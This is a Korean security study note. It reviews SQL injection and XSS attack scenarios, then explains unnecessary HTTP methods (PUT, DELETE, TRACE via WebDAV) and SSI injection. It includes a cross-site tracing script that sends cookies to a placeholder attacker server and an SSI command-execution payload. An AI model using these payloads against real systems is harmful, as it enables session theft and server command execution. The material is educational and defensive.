정보보안 스터디 - 19주차 1일 - 불필요한 웹 메소드, SSI Injection 상세 연구

 

what? 무엇인지

where? 어디에서 발생하는지

why? 왜 발생하는지

scenario 뭘할 수 있는지

defence 어떻게 대응해야하는지

각각의 취약점에 대해 생각해보며 한마디로 정리할 수 있어야합니다.

 

 

☞ 시나리오 복습 및 상세 연구

 

SQLi 시나리오

1) DB 데이터 추출가능

 

2) DB 데이터 변조가능

 

3) DB 데이터를 이용한 인증/인가 우회가능 

 

4) 웹쉘 업로드가능

into outfile를 이용하여 DB서버에 파일을 업로드할 수 있습니다.

하지만 전제 조건은 DB서버와 웹서버가 안전하게 분리되어 있지 않고 하나로 통합되어 있을 경우에만

웹서버 경로에 웹쉘 업로드를 하여 실행시키는 의미가 있습니다.

 

5) 파일 다운로드 

load_file() 함수를 이용하여 파일을 다운받아 소스코드 확인 등 공격을 실시가능합니다.

DB서버에서의 파일 다운로드가 가능해보이긴 하지만 이것 역시 웹서버와 분리되어있다면 파일을 다운로드할 수 없어

크게 의미가 없습니다.

 

 

 

XSS 시나리오 

1) 이용자 세션 탈취

 

2) 피싱사이트 리다이렉션

 

3) HTML 페이지 변조

 

4) 키로거 삽입

 

 

 

☞ 추가 웹 해킹 취약점(원리와 위험한 이유)

 

[불필요한 웹 메소드]

프로젝트에서 보통 이 취약점을 잡는 분이 계시기는 하지만

다른 더 심각한 취약점이 있다면 굳이 안잡는 편입니다.

OPTIONS 를 이용해 허용하는 메소드를 확인할 수 있습니다. 확인하는 것 자체로는 그리 큰 취약점이 아니며 접근할 방법에 크게 없어 보입니다.

PUT /test.html (body부분에 test입력) 을 요청하여 파일 업로드를 시도하거나

DELETE 를 이용해 웹서버의 파일을 임의로 삭제시킬 수 있는 취약점이 존재합니다.

하지만 전제조건은 webDAV 기능이 활성화 되어있어야 한다는 점입니다.

webDAV는 웹서버에 NAS서버를 두고 파일 업로드를 시키기 위해 필요한 기능이라고 볼 수 있습니다.

그러니까 PUT을 외부이용자에게 허용하여야하고 webDAV기능도 활성화되어 있어야 한다는 겁니다.

 

 

또한 TRACE 메소드를 허용하고 있다면 세션 탈취가 가능하다는 말이 많습니다.

TRACE 메소드는 요청메세지에서 헤더에 있는 정보 들을 그대로 반사하는 기능을 가졌습니다.

여기에서 HTTPonly가 설정되어 있다면 일반적인 XSS방법으로는 세션탈취를 하지 못할거니까

피해자 측에서 TRACE 요청을 하도록 스크립트를 제작합니다. 즉 XST공격이 가능합니다.(XSS가 가능한 조건에서)

<script>
    var xmlhttp = new XMLHttpRequest();
    var url = 'http://공격서버/';
    
    xmlhttp.withCredentials = true;  // 쿠키 헤더 전달
    xmlhttp.open('TRACE', url, false);
    xmlhttp.send();
</script>

 

최신 브라우저에서는 HttpRequest함수가 GET, POST 기본 메소드를 제외한

TRACE는 안되도록 이미 보안상 막아뒀습니다.

따라서 옛날 방식이고 요즘에는 다 막아뒀습니다.

 

그러니 발견할 가능성이 적으며 취약점으로 뽑기에는 애매합니다.

하지만 webDAV의 경우는 한번 공격을 구현해볼 필요는 있습니다. 

 

 

 

[SSI (Server Side Includes) 인젝션]

SSI 인젝션 역시 .shtml 확장자를 사용하는 옛날 취약점이며

shtml을 사용했던 이유는 동적 페이지의 개념이 들어오면서 

shtml을 사용하면 동적 소스코드 역할을 하여 WAS서버처럼 실행 시켜줄 수 있었습니다.

 

형식은  <!--#command var -->  이며

이런 SSI 코드를 사용하는 페이지의 경우 인젝션이 가능합니다.

예를 들어 IP를 보여주거나 날짜데이터를 보여주는 곳에서 의심해볼 만합니다.

SSI 인젝션의 핵심은

<!--#exec cmd="ls"-->

가 서버측에 명령어 입력이 가능한 점이여서 위험합니다.  

하지만 현재는 거의 shtml확장자를 사용하지 않아 없다시피 여길 수 있습니다.